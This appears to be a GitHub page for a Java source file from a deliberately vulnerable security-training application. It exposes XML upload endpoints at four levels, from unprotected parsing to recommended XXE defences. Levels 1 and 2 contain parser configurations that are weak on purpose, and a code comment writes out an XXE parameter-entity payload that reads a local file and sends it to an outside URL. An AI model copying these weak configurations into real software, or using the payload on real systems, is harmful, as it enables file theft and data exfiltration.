-
-
Notifications
You must be signed in to change notification settings - Fork 427
/
Copy pathXXEVulnerability.java
209 lines (197 loc) · 9.86 KB
/
XXEVulnerability.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
package org.sasanlabs.service.vulnerability.xxe;
import java.io.InputStream;
import javax.servlet.http.HttpServletRequest;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Source;
import javax.xml.transform.sax.SAXSource;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.sasanlabs.internal.utility.LevelConstants;
import org.sasanlabs.internal.utility.Variant;
import org.sasanlabs.internal.utility.annotations.AttackVector;
import org.sasanlabs.internal.utility.annotations.VulnerableAppRequestMapping;
import org.sasanlabs.internal.utility.annotations.VulnerableAppRestController;
import org.sasanlabs.service.vulnerability.bean.GenericVulnerabilityResponseBean;
import org.sasanlabs.service.vulnerability.xxe.bean.Book;
import org.sasanlabs.service.vulnerability.xxe.bean.ObjectFactory;
import org.sasanlabs.service.vulnerability.xxe.dao.BookEntity;
import org.sasanlabs.service.vulnerability.xxe.dao.BookEntityRepository;
import org.sasanlabs.vulnerability.types.VulnerabilityType;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.RequestMethod;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
/**
* Resources referred while writing this Vulnerability. <br>
* General XXE: <br>
* 1. https://www.youtube.com/watch?v=DREgLWZqMWg <br>
* 2. https://portswigger.net/web-security/xxe <br>
* 3. https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9 <br>
*
* <p>Parameter Entities attack:<br>
* 1. https://securitylab.github.com/research/restlet_xxe_vulnerability_CVE-2017-14949 <br>
*
* <p>Prevention technique: <br>
* 1.
* https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
* <br>
*
* @author KSASAN [email protected]
*/
@VulnerableAppRestController(descriptionLabel = "XXE_VULNERABILITY", value = "XXEVulnerability")
public class XXEVulnerability {
private BookEntityRepository bookEntityRepository;
private static final transient Logger LOGGER = LogManager.getLogger(XXEVulnerability.class);
public XXEVulnerability(BookEntityRepository bookEntityRepository) {
// This needs to be done to access Server's Local File and doing Http Outbound call.
System.setProperty("javax.xml.accessExternalDTD", "all");
this.bookEntityRepository = bookEntityRepository;
}
// No XXE protection
@AttackVector(vulnerabilityExposed = VulnerabilityType.XXE, description = "XXE_NO_VALIDATION")
@VulnerableAppRequestMapping(
value = LevelConstants.LEVEL_1,
htmlTemplate = "LEVEL_1/XXE",
requestMethod = RequestMethod.POST)
public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel1(
HttpServletRequest request) {
try {
InputStream in = request.getInputStream();
JAXBContext jc = JAXBContext.newInstance(ObjectFactory.class);
Unmarshaller jaxbUnmarshaller = jc.createUnmarshaller();
@SuppressWarnings("unchecked")
JAXBElement<Book> bookJaxbElement =
(JAXBElement<Book>) (jaxbUnmarshaller.unmarshal(in));
BookEntity bookEntity =
new BookEntity(bookJaxbElement.getValue(), LevelConstants.LEVEL_1);
bookEntityRepository.save(bookEntity);
return new ResponseEntity<GenericVulnerabilityResponseBean<Book>>(
new GenericVulnerabilityResponseBean<Book>(bookJaxbElement.getValue(), true),
HttpStatus.OK);
} catch (Exception e) {
LOGGER.error(e);
}
return new ResponseEntity<GenericVulnerabilityResponseBean<Book>>(
new GenericVulnerabilityResponseBean<Book>(null, false), HttpStatus.OK);
}
/**
* Saves the JAXB Entity to Database and also builds the response.
*
* @param spf
* @param in
* @param level
* @return GenericVulnerabilityResponseBean book
* @throws JAXBException
* @throws SAXException
* @throws ParserConfigurationException
*/
private ResponseEntity<GenericVulnerabilityResponseBean<Book>> saveJaxBBasedBookInformation(
SAXParserFactory spf, InputStream in, String level)
throws JAXBException, SAXException, ParserConfigurationException {
JAXBContext jc = JAXBContext.newInstance(ObjectFactory.class);
Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(in));
Unmarshaller jaxbUnmarshaller = jc.createUnmarshaller();
@SuppressWarnings("unchecked")
JAXBElement<Book> bookJaxbElement =
(JAXBElement<Book>) (jaxbUnmarshaller.unmarshal(xmlSource));
BookEntity bookEntity = new BookEntity(bookJaxbElement.getValue(), level);
bookEntityRepository.save(bookEntity);
return new ResponseEntity<GenericVulnerabilityResponseBean<Book>>(
new GenericVulnerabilityResponseBean<Book>(bookJaxbElement.getValue(), true),
HttpStatus.OK);
}
/*
* Case insensitive DOCTYPE is not allowed so therefore not adding a level for
* that.
*/
/**
* if external-parameter-entities are allowed then those parameter entities can cause harm like:
*
* <p><!ENTITY % file SYSTEM "file:///etc/notify.conf"> <!ENTITY % eval "<!ENTITY %
* exfiltrate SYSTEM 'https://www.google.com/?x=%file;'>"> <!ENTITY xxe
* 'file:///etc/notify.conf'> %eval; %exfiltrate; <?xml version="1.0" encoding="UTF-8"?>
*
* <p><!DOCTYPE root [ <!ENTITY % param1 SYSTEM "<file location refering DTD which has some code
* like above.>"> %param1; ]> <book> <name>singh</name> <isbn>isbn</isbn>
* <author>author</author> <publisher>exf</publisher> </book> <br>
* Only Disabling General Entities cannot stop the XXE as General Parameter entities can cause
* harmful attacks Like sending internal information to attacker controlled Website http
* outbound call.
*/
@AttackVector(
vulnerabilityExposed = VulnerabilityType.XXE,
description = "XXE_DISABLE_GENERAL_ENTITY")
@VulnerableAppRequestMapping(
value = LevelConstants.LEVEL_2,
htmlTemplate = "LEVEL_1/XXE",
requestMethod = RequestMethod.POST)
public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel2(
HttpServletRequest request) {
try {
InputStream in = request.getInputStream();
// Only disabling external Entities
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
return saveJaxBBasedBookInformation(spf, in, LevelConstants.LEVEL_2);
} catch (Exception e) {
LOGGER.error(e);
}
return new ResponseEntity<GenericVulnerabilityResponseBean<Book>>(
new GenericVulnerabilityResponseBean<Book>(null, false), HttpStatus.OK);
}
// Protects against all XXE attacks. This is the configuration which is needed
// in case application requires DOCTYPE declarations.
@AttackVector(
vulnerabilityExposed = VulnerabilityType.XXE,
description = "XXE_DISABLE_GENERAL_AND_PARAMETER_ENTITY")
@VulnerableAppRequestMapping(
value = LevelConstants.LEVEL_3,
htmlTemplate = "LEVEL_1/XXE",
requestMethod = RequestMethod.POST,
variant = Variant.SECURE)
public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel3(
HttpServletRequest request) {
try {
InputStream in = request.getInputStream();
// disabling external Entities and parameter Entities
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
return saveJaxBBasedBookInformation(spf, in, LevelConstants.LEVEL_3);
} catch (Exception e) {
LOGGER.error(e);
}
return new ResponseEntity<GenericVulnerabilityResponseBean<Book>>(
new GenericVulnerabilityResponseBean<Book>(null, false), HttpStatus.OK);
}
// Protects against XXE. This is the configuration where DOCTYPE declaration is
// not required.
@VulnerableAppRequestMapping(
value = LevelConstants.LEVEL_4,
htmlTemplate = "LEVEL_1/XXE",
requestMethod = RequestMethod.POST,
variant = Variant.SECURE)
public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel4(
HttpServletRequest request) {
try {
InputStream in = request.getInputStream();
// Disabling DocType. Recommended approach
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
return saveJaxBBasedBookInformation(spf, in, LevelConstants.LEVEL_4);
} catch (Exception e) {
LOGGER.error(e);
}
return new ResponseEntity<GenericVulnerabilityResponseBean<Book>>(
new GenericVulnerabilityResponseBean<Book>(null, false), HttpStatus.OK);
}
}